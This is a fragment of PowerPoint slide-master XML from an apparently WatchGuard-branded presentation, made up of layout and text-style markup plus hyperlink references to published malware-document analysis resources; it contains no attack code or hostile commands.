                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3BE2AAB6-80C9-D04C-812E-2AE858C1AEC4}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="902658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Divider - World">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 7"/>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4766" y="2"/>
            <a:ext cx="9183687" cy="5164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p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4766" y="2218136"/>
            <a:ext cx="9183687" cy="973931"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="61000"/>
            </a:schemeClr>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-4607" t="-4552" r="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-431074" y="-574766"/>
            <a:ext cx="9619528" cy="573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a:xfrm>
            <a:off x="4766" y="2218136"/>
            <a:ext cx="9183687" cy="973931"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:alpha val="61000"/>
            </a:schemeClr>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5295" y="2218211"/>
            <a:ext cx="9182851" cy="974309"/>
          </a:xfrm>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="36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33897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800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="825001"/>
            <a:ext cx="4038600" cy="3769622"/>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40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825003"/>
            <a:ext cx="4038600" cy="3769621"/>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40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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3DBEFFC9-7588-9E46-A8CC-C2BF237A9622}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1773917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800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{BFF4D27F-4202-7D43-95B6-A3AF6F94866E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="714320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5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1953CE69-63AC-3847-8C1E-2B63C80ABEBC}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11581157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7"/>
            <a:ext cx="3008313" cy="871538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>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3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="28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3" y="1076327"/>
            <a:ext cx="3008313" cy="3518297"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3678D7F1-4F6E-A640-969F-09B719C907E9}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18064452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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 7"/>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a:off x="15036" y="1332411"/>
            <a:ext cx="9128963" cy="2233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0" y="2069870"/>
            <a:ext cx="9120188" cy="735677"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{185C00F6-8687-794D-9AF3-C50808490187}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7428494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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5075636"/>
            <a:ext cx="9144000" cy="67865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CD092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027" name="Title Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="205980"/>
            <a:ext cx="8229600" cy="506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8" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="769145"/>
            <a:ext cx="8229600" cy="3825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6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8528050" y="-29765"/>
            <a:ext cx="592138" cy="27384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900">
                <a:solidFill>
                  <a:srgbClr val="3A3A3A"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3E9BDD6A-35E9-5D49-A88C-77E47882874B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="92056" y="4890970"/>
            <a:ext cx="2449513"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ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="457200" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="457200" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="457200" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="457200" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A3A3A"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Copyright </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A3A3A"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>©2020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A3A3A"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="600" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A3A3A"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A3A3A"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WatchGuard Technologies, Inc. All Rights Reserved</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Picture 3" descr="WG_logo_Color_3in.png"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7632700" y="4702969"/>
            <a:ext cx="1397000" cy="30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128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs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cs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cs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cs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cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483804" r:id="rId1"/>
    <p:sldLayoutId id="2147483798" r:id="rId2"/>
    <p:sldLayoutId id="2147483806" r:id="rId3"/>
    <p:sldLayoutId id="2147483808" r:id="rId4"/>
    <p:sldLayoutId id="2147483799" r:id="rId5"/>
    <p:sldLayoutId id="2147483800" r:id="rId6"/>
    <p:sldLayoutId id="2147483801" r:id="rId7"/>
    <p:sldLayoutId id="2147483802" r:id="rId8"/>
    <p:sldLayoutId id="2147483810" r:id="rId9"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="457189" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2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2pPr>
      <a:lvl3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3pPr>
      <a:lvl4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4pPr>
      <a:lvl5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5pPr>
      <a:lvl6pPr marL="457189" algn="l" defTabSz="457189" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914377" algn="l" defTabSz="457189" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371566" algn="l" defTabSz="457189" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828754" algn="l" defTabSz="457189" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342891" indent="-342891" algn="l" defTabSz="457189" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="A6A6A6"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742932" indent="-285744" algn="l" defTabSz="457189" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="A6A6A6"/>
        </a:buClr>
        <a:buFont typeface="Arial" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1142971" indent="-228594" algn="l" defTabSz="457189" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="A6A6A6"/>
        </a:buClr>
        <a:buFont typeface="Arial" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600160" indent="-228594" algn="l" defTabSz="457189" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="A6A6A6"/>
        </a:buClr>
        <a:buFont typeface="Arial" charset="0"/>
        <a:buChar char="–"/>
        <a:defRPr sz="1600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057349" indent="-228594" algn="l" defTabSz="457189" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="A6A6A6"/>
        </a:buClr>
        <a:buFont typeface="Arial" charset="0"/>
        <a:buChar char="»"/>
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>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k4sth4/Malicious-HTA-File"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hyperlink" Target="https://notepad-plus-plus.org/downloads/"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developer.chrome.com/docs/devtools/"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blog.didierstevens.com/program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www.mitec.cz/ssv.html"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www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/down-the-rabbit-hole-extracting-maliciousness-from-msg-files-without-outlook/"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hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/"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threatpost.com/qbot-banking-trojan-hits-u-s-businesses-fbi/166171/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 